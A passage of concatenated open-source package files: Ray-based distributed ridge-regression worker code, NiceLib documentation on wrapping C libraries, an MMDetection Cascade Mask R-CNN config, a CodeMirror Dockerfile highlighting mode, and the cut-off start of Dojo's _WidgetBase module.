                                              self.data_server_handle[iserver%ndata_servers])
                   for iserver, w in enumerate(workers)]
        ray.get(futures)
        # This launches workers on the bootstrapped data set + original data
        # and determines the fit parameters and error there on
        updated_regularization = \
            copy.deepcopy(self.get_regularization_parameters_from_server())
        # re-initialize workers with optimal regularization
        futures = [w.update_initial_parameters.remote(initial_fit_parameters,
                                                      updated_regularization,
                                                      iterator_chunk)
                   for w, iterator_chunk in zip(
                       workers, self.iterators.chunked_bootstrap_model_iterator
                   )]
        ray.get(futures)
        # reset parameters on server for final run.
        self.reset_fit_parameters()
        futures = [w.async_update_loop.remote(self.parameter_server_handle,
                                              self.data_server_handle[iserver%ndata_servers])
                   for iserver, w in enumerate(workers)]
        ray.get(futures)
class regressionWorker:
    """
    Regression worker class.

    This class defines the workers used in the regression analysis to
    determine the systematics and transit model parameters.  A worker is
    initialized with (deep copies of) the current fit parameters, the
    current regularization and an iterator chunk defining which
    (bootstrap sample, regressor selection) pairs it is responsible for.
    Calling ``async_update_loop`` performs the ridge regressions for that
    chunk and pushes the results back to the parameter server.
    """
    def __init__(self, initial_fit_parameters, initial_regularization,
                 iterator_chunk):
        """
        Initialize the regression worker.

        Parameters
        ----------
        initial_fit_parameters : 'SimpleNamespace'
            All parameters controling the regression model.
        initial_regularization : 'SimpleNamespace'
            All parameters controling the regularization.
        iterator_chunk : 'list'
            Iterator chunk over data and bootstrap selections.
        """
        # Deep copies so that updates made by this worker never mutate
        # the caller's objects.
        self.fit_parameters = copy.deepcopy(initial_fit_parameters)
        self.regularization = copy.deepcopy(initial_regularization)
        self.iterator = iterator_chunk
    def update_initial_parameters(self,
                                  updated_fit_parameters,
                                  updated_regularization,
                                  updated_iterator_chunk):
        """
        Update all parameters of this worker.

        Parameters
        ----------
        updated_fit_parameters : 'SimpleNamespace'
            All parameters controling the regression model.
        updated_regularization : 'SimpleNamespace'
            All parameters controling the regularization.
        updated_iterator_chunk : 'list'
            Iterator chunk over data and bootstrap selections.

        Returns
        -------
        None.
        """
        self.fit_parameters = copy.deepcopy(updated_fit_parameters)
        self.regularization = copy.deepcopy(updated_regularization)
        self.iterator = updated_iterator_chunk
    def compute_model(self, regression_data, regularization_method, alpha):
        """
        Compute the regression model for a single data selection.

        Parameters
        ----------
        regression_data : 'tuple'
            Tuple ``(regression_data_selection,
            regression_matrix_selection)`` as returned by the data
            server: the selected data to be modeled and the unscaled
            regression matrix with its feature-scaling information.
        regularization_method : 'str'
            Method used to create the regularization matrix.
        alpha : 'float' or 'ndarray'
            Regularization strength passed to the ridge regression.

        Returns
        -------
        beta_optimal : 'ndarray'
            Regression coefficients, rescaled back to the unscaled
            features.
        rss : 'float'
            Residual sum of squares of the fit.
        mse : 'float'
            Mean squared error of the fit.
        degrees_of_freedom : 'float'
            Effective degrees of freedom of the fit.
        model_unscaled : 'ndarray'
            Evaluated regression model.
        alpha : 'float'
            Regularization strength returned by the ridge regression.
        aic : 'float'
            Akaike information criterion of the fit.
        phase : 'ndarray'
            Orbital phase values of the modeled data.
        wavelength : 'ndarray'
            Wavelength(s) of the modeled data.
        """
        # Unpack the data and the regression (design) matrix.
        regression_data_selection, regression_matrix_selection = \
            regression_data
        data_unscaled, wavelength, phase, covariance, _ = \
            regression_data_selection
        (regression_matrix_unscaled, n_additional, feature_mean,
         feature_scale) = regression_matrix_selection
        # Create the regularization matrix.
        n_parameter = regression_matrix_unscaled.shape[1]
        delta = create_regularization_matrix(regularization_method,
                                             n_parameter,
                                             n_additional)
        # Ridge regression on the (feature-scaled) design matrix.
        (beta_optimal, rss, mse, degrees_of_freedom,
         model_unscaled, alpha, aic) = \
            ridge(regression_matrix_unscaled, data_unscaled,
                  covariance, delta, alpha)
        # Scale the coefficients back; only beta[2:] correspond to scaled
        # features, and the intercept term absorbs the mean offsets.
        beta_optimal[0] -= np.sum(beta_optimal[2:]*feature_mean /
                                  feature_scale)
        beta_optimal[2:] = beta_optimal[2:]/feature_scale
        return (beta_optimal, rss, mse, degrees_of_freedom, model_unscaled,
                alpha, aic, phase, wavelength)
    @staticmethod
    def get_data_chunck(data_server_handle, regression_selection,
                        bootstrap_selection):
        """
        Get a chunk of the data.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.
        regression_selection : 'list'
            List of indici defining the data to be modeled and the
            corresponding data to be used as regressors.
        bootstrap_selection : 'list'
            List of indici defining the bootstrap selection.

        Returns
        -------
        regression_data_selection : 'ndarray'
            Selection of data to be modeled.
        regression_matrix_selection : TYPE
            Selection of data used as regression matrix.
        """
        regression_data_selection, regression_matrix_selection = \
            data_server_handle.get_regression_data(
                regression_selection,
                bootstrap_indici=bootstrap_selection)
        return regression_data_selection, regression_matrix_selection
    @staticmethod
    def get_data_per_bootstrap_step(data_server_handle, regression_selections,
                                    bootstrap_selection):
        """
        Get all data chunks used in the regression per bootstrap step.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.
        regression_selections : TYPE
            Collection of regression selections, forwarded to the data
            server's ``get_all_regression_data`` method.
        bootstrap_selection : 'ndarray'
            Indici defining the bootstrap sampling.

        Returns
        -------
        selection_list : 'list'
            List with all data and regression matrix selections.
        """
        selection_list = \
            data_server_handle.get_all_regression_data(
                regression_selections, bootstrap_indici=bootstrap_selection)
        return selection_list
    @staticmethod
    def get_regression_data_chunk(data_server_handle, iterator_chunk):
        """
        Get all regression data for one iterator (sub-)chunk.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.
        iterator_chunk : 'list'
            Iterator chunk over data and bootstrap selections.

        Returns
        -------
        selection_list : 'list'
            List with the data and regression matrix selection for each
            item in the chunk.
        """
        selection_list = \
            data_server_handle.get_regression_data_chunk(iterator_chunk)
        return selection_list
    @staticmethod
    def get_regression_parameters(parameter_server_handle):
        """
        Get regression control parameters from the parameter server.

        Parameters
        ----------
        parameter_server_handle : regressionParameterServer
            Instance of the parameter server.

        Returns
        -------
        n_additional : 'int'
            Number of additional regressors.
        ncorrect : 'int'
            Number of data points at the short wavelength side cut by the
            region of interest compared to the full dataset. This
            parameter is used to make sure the parameters are stored
            correctly in an array with a size corresponding to the total
            data volume.
        n_sub_chunks : 'int'
            Number of sub-chunks loaded from the data server per request.
        """
        regression_par = parameter_server_handle.get_regression_parameters()
        n_additional = regression_par.n_additional_regressors
        n_sub_chunks = regression_par.number_of_sub_chunks_per_load
        data_par = parameter_server_handle.get_data_parameters()
        ncorrect = data_par.ncorrect
        return n_additional, ncorrect, n_sub_chunks
    def update_parameters_on_server(self, parameter_server_handle):
        """
        Push this worker's results to the parameter server.

        Parameters
        ----------
        parameter_server_handle : 'regressionParameterServer'
            Instance of the parameter server class.

        Returns
        -------
        None.
        """
        # These calls are synchronous; their return values are not
        # needed.
        parameter_server_handle.update_fitted_parameters(
            self.fit_parameters)
        parameter_server_handle.update_optimal_regulatization(
            self.regularization)
    @staticmethod
    def chunks(lst, n):
        """Yield successive n-sized chunks from lst."""
        for i in range(0, len(lst), n):
            yield lst[i:i + n]
    def async_update_loop(self, parameter_server_handle, data_server_handle):
        """
        Run the regression loop over the regression and bootstrap selections.

        For every (bootstrap sample, regressor selection) pair in this
        worker's iterator chunk, the corresponding data is fetched from
        the data server (in sub-chunks of ``n_sub_chunks`` items per
        load), the ridge-regression model is computed and the results are
        stored in ``self.fit_parameters`` and ``self.regularization``.
        After the whole chunk is processed the results are pushed to the
        parameter server.

        Parameters
        ----------
        parameter_server_handle : 'regressionParameterServer'
            Instance of the parameter server.
        data_server_handle : 'regressionDataServer'
            Instance of the data server.

        Returns
        -------
        None.
        """
        n_additional, ncorrect, n_sub_chunks = \
            self.get_regression_parameters(parameter_server_handle)
        regularization_method = 'value'
        iterator_chunk, chunk_size = self.iterator
        sub_chunks = self.chunks(iterator_chunk, n_sub_chunks)
        for sub_chunk in sub_chunks:
            # Fetch all data for this sub-chunk in one server call.
            regression_data_sub_chunk = \
                self.get_regression_data_chunk(data_server_handle, sub_chunk)
            for (((iboot, bootstrap_selection),
                  (idata_point, regression_selection)),
                 regression_data) in zip(sub_chunk, regression_data_sub_chunk):
                (_, _), (index_disp_regressors, _), nwave = \
                    regression_selection
                (beta_optimal, rss, mse, degrees_of_freedom, model_unscaled,
                 alpha, aic, phase, wavelength) = self.compute_model(
                     regression_data, regularization_method,
                     self.regularization.optimal_alpha[idata_point])
                self.regularization.optimal_alpha[idata_point] = alpha
                self.fit_parameters.\
                    fitted_spectrum[iboot, idata_point] = beta_optimal[1]
                self.fit_parameters.\
                    fitted_model[iboot, idata_point, :] = model_unscaled
                self.fit_parameters.\
                    fitted_time[iboot, idata_point, :] = phase
                self.fit_parameters.\
                    wavelength_fitted_spectrum[iboot, idata_point] = wavelength
                self.fit_parameters.fitted_mse[iboot, idata_point] = mse
                self.fit_parameters.fitted_aic[iboot, idata_point] = aic
                self.fit_parameters.\
                    degrees_of_freedom[iboot, idata_point] = degrees_of_freedom
                # Store the dispersion-direction regressor coefficients at
                # their wavelength positions; ncorrect compensates for the
                # data points cut away by the region of interest.
                self.fit_parameters.\
                    regression_results[
                        iboot, idata_point,
                        index_disp_regressors+n_additional-ncorrect
                    ] = beta_optimal[n_additional:]
                self.fit_parameters.\
                    regression_results[iboot, idata_point, 0:n_additional] = \
                    beta_optimal[0:n_additional]
            # Free the (potentially large) sub-chunk before the next load.
            del regression_data_sub_chunk
        self.update_parameters_on_server(parameter_server_handle)
@ray.remote
class rayRegressionWorker(regressionWorker):
    """
    Ray remote-actor wrapper around the regressionWorker class.

    Overrides the data- and parameter-server access methods of
    regressionWorker so that all server communication goes through Ray's
    ``.remote()``/``ray.get`` API.
    """
    def __init__(self, initial_fit_parameters, initial_regularization,
                 iterator_chunk):
        """
        Initialize the Ray regression worker.

        All arguments are passed unchanged to regressionWorker.
        """
        super().__init__(initial_fit_parameters, initial_regularization,
                         iterator_chunk)
    @staticmethod
    def get_data_chunck(data_server_handle, regression_selection,
                        bootstrap_selection):
        """
        Get a chunk of the data.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Ray actor handle of the data server.
        regression_selection : 'list'
            List of indici defining the data to be modeled and the
            corresponding data to be used as regressors.
        bootstrap_selection : 'list'
            List of indici defining the bootstrap selection.

        Returns
        -------
        regression_data_selection : 'ndarray'
            Selection of data to be modeled.
        regression_matirx_selection : TYPE
            Selection of data used as regression matrix.
        """
        regression_data_selection, regression_matirx_selection = \
            ray.get(data_server_handle.get_regression_data.remote(
                regression_selection,
                bootstrap_indici=bootstrap_selection))
        return regression_data_selection, regression_matirx_selection
    @staticmethod
    def get_data_per_bootstrap_step(data_server_handle, regression_selections,
                                    bootstrap_selection):
        """
        Get all data chunks used in the regression per bootstrap step.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Ray actor handle of the data server.
        regression_selections : TYPE
            Collection of regression selections, forwarded to the data
            server's ``get_all_regression_data`` method.
        bootstrap_selection : 'ndarray'
            Indici defining the bootstrap sampling.

        Returns
        -------
        selection_list : 'list'
            List with all data and regression matrix selections.
        """
        selection_list = \
            ray.get(data_server_handle.get_all_regression_data.remote(
                regression_selections, bootstrap_indici=bootstrap_selection))
        return selection_list
    @staticmethod
    def get_regression_data_chunk(data_server_handle, iterator_chunk):
        """
        Get all regression data for one iterator (sub-)chunk.

        Parameters
        ----------
        data_server_handle : TYPE
            Ray actor handle of the data server.
        iterator_chunk : TYPE
            Iterator chunk over data and bootstrap selections.

        Returns
        -------
        selection_list : TYPE
            List with the data and regression matrix selection for each
            item in the chunk.
        """
        selection_list = \
            ray.get(data_server_handle.get_regression_data_chunk.remote(
                iterator_chunk))
        return selection_list
    @staticmethod
    def get_regression_parameters(parameter_server_handle):
        """
        Get regression control parameters from the parameter server.

        Parameters
        ----------
        parameter_server_handle : regressionParameterServer
            Ray actor handle of the parameter server.

        Returns
        -------
        n_additional : 'int'
            Number of additional regressors.
        ncorrect : 'int'
            Number of data points at the short wavelength side cut by the
            region of interest compared to the full dataset. This
            parameter is used to make sure the parameters are stored
            correctly in an array with a size corresponding to the total
            data volume.
        n_sub_chunks : 'int'
            Number of sub-chunks loaded from the data server per request.
        """
        regression_par = \
            ray.get(parameter_server_handle.get_regression_parameters.remote())
        n_additional = regression_par.n_additional_regressors
        n_sub_chunks = regression_par.number_of_sub_chunks_per_load
        data_par = \
            ray.get(parameter_server_handle.get_data_parameters.remote())
        ncorrect = data_par.ncorrect
        return n_additional, ncorrect, n_sub_chunks
    def update_parameters_on_server(self, parameter_server_handle):
        """
        Update parameters on the parameter server.

        Each remote call is awaited with ``ray.get`` so this method only
        returns once the server has processed the update.

        Parameters
        ----------
        parameter_server_handle : 'regressionParameterServer'
            Ray actor handle of the parameter server.

        Returns
        -------
        None.
        """
        ftrs = parameter_server_handle.\
            update_fitted_parameters.remote(self.fit_parameters)
        ray.get(ftrs)
        ftrs = parameter_server_handle.\
            update_optimal_regulatization.remote(self.regularization)
        ray.get(ftrs)
/NiceLib-0.7.1.zip/NiceLib-0.7.1/docs/wrapping.rst | Creating Mid-Level Bindings
===========================
`NiceLib` is the base class that provides a nice interface for quickly defining mid-level library bindings. You define a subclass for each specific library (.dll/.so file) you wish to wrap. `NiceLib`'s metaclass then converts your specification into a wrapped library. You use this subclass directly, without instantiating it.
What Are Mid-Level Bindings?
----------------------------
It's worth discussing what we mean by "mid-level" bindings. Mid-level bindings have a one-to-one correspondence between low-level functions and mid-level functions. The difference is that each mid-level function has a more Pythonic interface that lets the user mostly or entirely avoid working with ``cffi`` directly. In other words, the overall structure of the library stays the same, but each individual function's interface may change.
These mid-level bindings can then be used to craft high-level bindings that might have a completely different structure than the underlying low-level library.
Let's say we want to wrap a motor-control library and its header looks something like this:
.. code-block:: c
// Example header file
typedef void* HANDLE;
int GeneralGetDeviceList(uint* devList, uint listSize);
void GeneralGetErrorString(int errCode, char *recvBuf, uint bufSize);
int GeneralOpenMotor(uint motorID, HANDLE *phMotor);
int MotorClose(HANDLE hMotor);
int MotorMoveTo(HANDLE hMotor, long pos);
int MotorGetPosition(HANDLE hMotor, long *pPos);
int MotorGetSerial(HANDLE hMotor, char *recvBuf, uint bufSize);
We would then write bindings like this::
from nicelib import load_lib, NiceLib, Sig, NiceObject, RetHandler, ret_ignore
@RetHandler(num_retvals=0)
def ret_errcode(retval):
if retval != 0:
raise MotorError(NiceMotor.GetErrorString(retval))
class NiceMotor(NiceLib):
_info_ = load_lib('awesomemotor', __package__)
_ret_ = ret_errcode
_prefix_ = 'General'
GetDeviceList = Sig('arr', 'len=20')
GetErrorString = Sig('in', 'buf', 'len', ret=ret_ignore)
OpenMotor = Sig('in', 'out')
class Motor(NiceObject):
_init_ = 'OpenMotor'
_prefix_ = 'Motor'
Close = Sig('in')
MoveTo = Sig('in', 'in')
GetPosition = Sig('in', 'out')
GetSerial = Sig('in', 'buf', 'len=64')
Then we can use the library like this::
motor_ids = NiceMotor.GetDeviceList()
for motor_id in motor_ids:
motor = NiceMotor.Motor(motor_id)
pos = motor.GetPosition()
serial = motor.GetSerial()
print("Motor {} is at position {}".format(serial, pos))
motor.Close()
There are a number of features in use in this example: prefix removal, return value wrapping, array and string buffer output, and a `NiceObject` with custom initializers. These make use of settings, which you can read more about below.
.. _settings:
Settings
--------
Settings, also called flags, give you extra control over how a library is wrapped. Settings are scoped, meaning that you can specify them on a class-wide, NiceObject-wide, and per-function basis. For example:
1. **Class-level**:
Give the NiceLib class an attribute with the setting name surrounded by single underscores::
class MyLib(NiceLib):
_buflen_ = 128
2. **NiceObject-level**:
Give the NiceObject class an attribute with the setting name surrounded by single underscores::
class MyLib(NiceLib):
class MyObject(NiceObject):
_buflen_ = 128
3. **Function-level**:
Pass settings as keyword args to the ``Sig`` constructor::
MyFunction = Sig('in', 'in', 'out', buflen=128)
The available settings are:
prefix
    A ``str`` or sequence of ``str``\s specifying prefixes to strip from the library function names. For example, if the library has functions named like ``SDK_Func()``, you can set ``_prefix_`` to ``'SDK_'``, and access them as ``Func()``. If multiple prefixes are given, they are tried in order for each signature until the appropriate function is found. The empty prefix ``''`` is always tried. Sometimes you may want to specify one library-wide prefix and a different per-object prefix, as done in the above example.
These prefixes also get stripped from macro names and enum constants.
ret
A function or ``str`` specifying a handler function to handle the return values of each library function. See :ref:`retval-handlers` for details.
buflen
An ``int`` specifying the default length for buffers and arrays. This can be overridden on a per-argument basis in the argument's spec string, e.g. ``'len=64'`` will make a 64-character buffer or a 64-element array.
free_buf
A function that is called on the pointer returned for 'bufout' argtypes, used for freeing their associated memory. It is called immediately after the buffer is copied to produce a Python string, but is not called if a null pointer is returned. May be None.
use_numpy
If True, convert output args marked as ``'arr'`` to numpy arrays. Requires numpy to be installed.
struct_maker
A function that is called to create an FFI struct of the given type. Mainly useful for odd libraries that require you to always fill out some field of the struct, like its size in bytes.
use_handle
Useful for creating "static methods" within a ``NiceObject``\—if False, the ``NiceObject``\'s handle(s) will not be passed into the C function. True by default. It only makes sense to specify this at the per-function level within a ``NiceObject``.
``NiceLib`` Class Attributes
----------------------------
``NiceLib`` subclasses make use of a few underscore-surrounded special class attributes. In addition to the class-wide *settings* described above, they include:
_info_
A :py:class:`LibInfo` object that contains access to the underlying library and macros. Required (unless you are using the old-style ``_ffi_``, ``_ffilib_``, and ``_defs_`` attributes)
Typically you will want to pass the relevant library attributes via a :py:class:`LibInfo` instance created using :py:func:`~nicelib.load_lib`, as shown in the examples above. However, it is currently possible to specify them directly. This was the original method, but may become deprecated in later versions of `NiceLib`.
_ffi_
FFI instance variable. Required if not using ``_info_``.
_ffilib_
FFI library opened with ``ffi.dlopen()``. Required if not using ``_info_``.
_defs_
``dict`` containing the Python-equivalent macros defined in the header file(s). Optional and only used if not using ``_info_``.
Function Signatures
-------------------
Function signatures are specified as ``Sig`` class attributes. A ``Sig``\s positional args are strings that define the input-output signature of the underlying C function. Per-function settings, like custom return value handling, are passed as keyword args.
It's important to note that a ``Sig`` is designed to closely match the signature of its C function, i.e. there's a one-to-one correspondence between arg strings and C function args.
The basic idea behind signature specifications is to handle input and output in a more Pythonic manner---inputs get passed in via a function's arguments, while its outputs get returned as part of the function's return values. Take the simple example from above::
OpenMotor = Sig('in', 'out')
This says that the C function's first argument (``uint motorID``) is used strictly as input, and its second argument (``HANDLE *phMotor``) is used strictly as output---the function takes an ID number and returns a handle to a newly opened motor. Using this signature allows us to call the function more naturally as ``handle = OpenMotor(motorID)``.
The available signature values are:
'in'
The argument is an input and gets passed into the mid-level function.
'out'
The argument is an output. It is not passed into the mid-level function, but is instead added to the list of return values. NiceLib automatically allocates an appropriate data structure, passes its address-pointer to the C function, uses the dereferenced result as the return value.
This can't be used for ``void`` pointers, since there's no way to know what to allocate, or what type to return.
'inout'
The argument is used as both input and output. The mid-level function takes it as an argument and also returns it with the return values. You can pass in either a value or a pointer to the value. For example, if the underlying C argument is an ``int *``, you can pass in a ``cffi`` ``int`` pointer, which will be used directly, or (more typically) you can pass in a Python int, which will be used as the initial value of a newly-created ``cffi`` int pointer.
'arr'
The argument is an array used only for *output*. The C argument is a pointer or array, into which the C-function writes. The result is added to the return values.
This is used for the common case of a C function which takes both an array (or pointer to a block of memory) and its length as inputs, to ensure that it doesn't overrun the array. As such, each ``'arr'`` requires a corresponding ``'len'`` entry. The first ``'arr'``/``'buf'`` in a ``Sig`` is matched with the first ``'len'`` and so forth. If the array is fixed-length and you don't need to pass in a length parameter to the C-function, use ``'arr[n]'`` as described below. If you need to pass in the array (and not auto-create it), use ``'in'``.
NiceLib will automatically create the buffer and pass it and the length parameter to the C-function. You simply receive the resulting array.
'arr[n]'
    The same as ``'arr'``, but does not have a matching ``'len'``. Because of this, the array length is specified directly as an int. For example, a 20-element array would be ``'arr[20]'``.
'bufout'
The argument is a pointer to a string buffer (a ``char**``). This is used for when the C library creates a string buffer and returns it to the user. NiceLib will automatically convert the output to a Python ``bytes``, or None if a null pointer was returned.
If the memory should be cleaned up by the user (as is usually the case), you may use the ``free_buf`` setting to specify the cleanup function.
'buf'
The same as ``'arr'``, but decodes the output string using ``ffi.string()`` before adding it to the return values.
This is used for the common case of a C function which takes both a string buffer and its length as inputs, so that it doesn't overrun the buffer. As such, ``'buf'`` requires a corresponding ``'len'`` entry. The first ``'buf'``/``'arr'`` is matched with the first ``'len'`` and so forth. If you don't need to pass in a length parameter to the C-function, use ``'buf[n]'`` as described below.
NiceLib will automatically create the buffer and pass it and the length parameter to the C-function. You simply receive the ``bytes``.
'buf[n]'
The same as ``'buf'``, but does not have a matching ``'len'``. Because of this, the buffer length is specified directly as an int. For example, a 20-char buffer would be ``'buf[20]'``.
'len'
The length of the buffer being passed to the C-function. See ``'arr'`` and ``'buf'`` for more info. This will use the length given by the innermost ``buflen`` flag/setting.
'len=n'
The same as ``'len'``, but with a directly specified length. For example, ``'len=32'`` allocates a buffer or array of length 32, regardless of the value of ``buflen``.
'len=in'
Similar to ``'len=n'``, except the mid-level function takes an input argument which is an ``int`` specifying the size of buffer that should be allocated for that invocation.
'ignore'
Ignore the argument, passing in 0 or NULL, depending on the arg type. This is useful for functions with "reserved" arguments which don't do anything.
.. _retval-handlers:
Return Value Handlers
---------------------
``RetHandler``\s, which specify functions to handle the return values of each library function, are given via the ``ret`` flag, as mentioned in :ref:`settings`. Return handlers are created by using the ``@RetHandler`` decorator---for example, the built-in ``ret_return`` handler is defined thusly::
@RetHandler(num_retvals=1)
def ret_return(retval):
return retval
``num_retvals`` indicates the number of values that the handler returns, which is often zero. Return handlers can be used to raise exceptions, return values, or even do custom handling based on what args were passed to the function.
A handler function takes the C function's return value---often an error/success code---as its first argument (see below for other optional parameters it may take). If the handler returns a non-None value, it will be appended to the wrapped function's return values.
Builtin Handlers
~~~~~~~~~~~~~~~~
There are two handlers that nicelib defines for convenience:
`ret_return()`
The default handler. Simply appends the return value to the wrapped function's return values.
`ret_ignore()`
Ignores the value entirely and does not return it. Useful for ``void`` functions
Injected Parameters
~~~~~~~~~~~~~~~~~~~
Sometimes it may be useful to give a handler more information about the function that was called, like the C parameters it was passed. If you define your handler to take one or more specially-named args, they will be automatically injected for you. These include:
funcargs
The list of all ``cffi``\-level args (including output args) that were passed to the C function
niceobj
The `NiceObject` instance whose method was called, or None for a top-level function
NiceObjects
-----------
Often a C library exposes a distinctly object-like interface like the one in our example. Essentially, you have a handle or ID of some resource (a motor in the example), which gets passed as the first argument to a subset of the library's functions. It makes sense to treat these functions as the *methods* of some type of object. NiceLib allows you to define these types of objects by subclassing `NiceObject`.
`NiceObject` class definitions are nested inside your `NiceLib` class definition, and consist of method ``Sig``\s and object-specific settings. When you instantiate a `NiceObject`, the args are passed to the `NiceObject`\'s *initializer*, which returns a handle. This handle is passed as the first parameter to all of the `NiceObject`\'s "methods" (unless the method has ``use_handle=False``). This initializer is specified using the `NiceObject`\'s ``_init_`` class attribute, which can be either a function or the name of one of the mid-level functions (as with ``'OpenMotor'`` in the example above). If ``_init_`` is not defined, the args passed to the `NiceObject`\'s constructor are used directly as the handle.
Without using ``_init_``, object construction would look like this::
handle = MyNiceLib.GetHandle()
my_obj = MyNiceLib.MyObject(handle)
my_obj.AwesomeMethod()
But if we use ``_init_``::
class MyNiceLib(NiceLib):
[...]
GetHandle = Sig('out')
class MyObject(NiceObject):
_init_ = 'GetHandle'
[...]
we can then do this::
my_obj = MyNiceLib.MyObject()
my_obj.AwesomeMethod()
and bypass passing around handles at all.
Multi-value handles
~~~~~~~~~~~~~~~~~~~
Usually an object will have only a single value as its handle, like an ID. In the unusual case that you have functions which take more than one value which act as a collective 'handle', you should specify this number as ``_n_handles_`` in your `NiceObject` subclass.
Auto-Generating Bindings
------------------------
If NiceLib is able to parse your library's headers successfully, you can generate a convenient binding skeleton using `generate_bindings()`.
| PypiClean |
# Legacy (MMDetection 1.x-compatible) Cascade Mask R-CNN R-50-FPN 1x COCO
# config. Uses the Legacy* anchor generator / delta box coder and unaligned
# RoIAlign so that checkpoints trained with MMDetection 1.x reproduce their
# original results.
_base_ = [
    '../_base_/models/cascade_mask_rcnn_r50_fpn.py',
    '../_base_/datasets/coco_instance.py',
    '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
    type='CascadeRCNN',
    backbone=dict(
        type='ResNet',
        depth=50,
        num_stages=4,
        out_indices=(0, 1, 2, 3),
        frozen_stages=1,
        norm_cfg=dict(type='BN', requires_grad=True),
        norm_eval=True,
        style='pytorch',
        init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
    neck=dict(
        type='FPN',
        in_channels=[256, 512, 1024, 2048],
        out_channels=256,
        num_outs=5),
    rpn_head=dict(
        # center_offset=0.5 reproduces the 1.x anchor placement.
        anchor_generator=dict(type='LegacyAnchorGenerator', center_offset=0.5),
        bbox_coder=dict(
            type='LegacyDeltaXYWHBBoxCoder',
            target_means=[.0, .0, .0, .0],
            target_stds=[1.0, 1.0, 1.0, 1.0])),
    roi_head=dict(
        bbox_roi_extractor=dict(
            type='SingleRoIExtractor',
            roi_layer=dict(
                type='RoIAlign',
                output_size=7,
                sampling_ratio=2,
                aligned=False)),
        # Three cascade stages. Only the regression std-devs differ between
        # stages (they shrink as boxes get refined), so the three heads are
        # generated from the per-stage std list instead of being written out
        # three times.
        bbox_head=[
            dict(
                type='Shared2FCBBoxHead',
                reg_class_agnostic=True,
                in_channels=256,
                fc_out_channels=1024,
                roi_feat_size=7,
                num_classes=80,
                bbox_coder=dict(
                    type='LegacyDeltaXYWHBBoxCoder',
                    target_means=[0., 0., 0., 0.],
                    target_stds=stage_stds))
            for stage_stds in ([0.1, 0.1, 0.2, 0.2],
                               [0.05, 0.05, 0.1, 0.1],
                               [0.033, 0.033, 0.067, 0.067])
        ],
        mask_roi_extractor=dict(
            type='SingleRoIExtractor',
            roi_layer=dict(
                type='RoIAlign',
                output_size=14,
                sampling_ratio=2,
                aligned=False))))
dist_params = dict(backend='nccl', port=29515)
/Flask-MDEditor-0.1.4.tar.gz/Flask-MDEditor-0.1.4/flask_mdeditor/static/mdeditor/js/lib/codemirror/mode/dockerfile/dockerfile.js |
// CodeMirror "simple mode" for Dockerfile syntax highlighting.
// UMD wrapper: works under CommonJS, AMD, or as a plain browser global.
(function(mod) {
  if (typeof exports == "object" && typeof module == "object") // CommonJS
    mod(require("../../lib/codemirror"), require("../../addon/mode/simple"));
  else if (typeof define == "function" && define.amd) // AMD
    define(["../../lib/codemirror", "../../addon/mode/simple"], mod);
  else // Plain browser env
    mod(CodeMirror);
})(function(CodeMirror) {
  "use strict";

  // All Dockerfile directives (matched case-insensitively). Includes the
  // LABEL/ARG/STOPSIGNAL/HEALTHCHECK/SHELL instructions from the current
  // Dockerfile reference in addition to the classic set.
  var instructions = ["from", "maintainer", "run", "cmd", "expose", "env",
                      "add", "copy", "entrypoint", "volume", "user",
                      "workdir", "onbuild", "label", "arg", "stopsignal",
                      "healthcheck", "shell"],
      instructionRegex = "(" + instructions.join('|') + ")",
      // An instruction alone on a line (trailing whitespace allowed).
      instructionOnlyLine = new RegExp(instructionRegex + "\\s*$", "i"),
      // An instruction followed by at least one whitespace-separated argument.
      instructionWithArguments = new RegExp(instructionRegex + "(\\s+)", "i");

  CodeMirror.defineSimpleMode("dockerfile", {
    start: [
      // Block comment: a line starting with a comment.
      {
        regex: /#.*$/,
        token: "comment"
      },
      // Highlight an instruction without any arguments (for convenience).
      {
        regex: instructionOnlyLine,
        token: "variable-2"
      },
      // Highlight an instruction followed by arguments.
      {
        regex: instructionWithArguments,
        token: ["variable-2", null],
        next: "arguments"
      },
      {
        regex: /./,
        token: null
      }
    ],
    arguments: [
      {
        // A comment line where instruction arguments were expected is an error.
        regex: /#.*$/,
        token: "error",
        next: "start"
      },
      {
        // Line continuation: the arguments continue on the following line.
        regex: /[^#]+\\$/,
        token: null
      },
      {
        // Match everything up to an inline comment.
        regex: /[^#]+/,
        token: null,
        next: "start"
      },
      {
        regex: /$/,
        token: null,
        next: "start"
      },
      // Fail-safe return to start.
      {
        token: null,
        next: "start"
      }
    ]
  });

  CodeMirror.defineMIME("text/x-dockerfile", "dockerfile");
});
/FreePyBX-1.0-RC1.tar.gz/FreePyBX-1.0-RC1/freepybx/public/js/dijit/_WidgetBase.js.uncompressed.js | define("dijit/_WidgetBase", [
"require", // require.toUrl
"dojo/_base/array", // array.forEach array.map
"dojo/aspect",
"dojo/_base/config", // config.blankGif
"dojo/_base/connect", // connect.connect
"dojo/_base/declare", // declare
"dojo/dom", // dom.byId
"dojo/dom-attr", // domAttr.set domAttr.remove
"dojo/dom-class", // domClass.add domClass.replace
"dojo/dom-construct", // domConstruct.create domConstruct.destroy domConstruct.place
"dojo/dom-geometry", // isBodyLtr
"dojo/dom-style", // domStyle.set, domStyle.get
"dojo/_base/kernel",
"dojo/_base/lang", // mixin(), isArray(), etc.
"dojo/on",
"dojo/ready",
"dojo/Stateful", // Stateful
"dojo/topic",
"dojo/_base/window", // win.doc.createTextNode
"./registry" // registry.getUniqueId(), registry.findWidgets()
], function(require, array, aspect, config, connect, declare,
dom, domAttr, domClass, domConstruct, domGeometry, domStyle, kernel,
lang, on, ready, Stateful, topic, win, registry){
/*=====
var Stateful = dojo.Stateful;
=====*/
// module:
// dijit/_WidgetBase
// summary:
// Future base class for all Dijit widgets.
// For back-compat, remove in 2.0.
if(!kernel.isAsync){
ready(0, function(){
var requires = ["dijit/_base/manager"];
require(requires); // use indirection so modules not rolled into a build
});
}
// Nested hash listing attributes for each tag, all strings in lowercase.
// ex: {"div": {"style": true, "tabindex" true}, "form": { ...
var tagAttrs = {};
// Build a lookup hash of the given object's property names, all lowercased.
// Used to test whether a DOMNode supports a particular attribute name.
function getAttrs(obj){
    var names = {}, key;
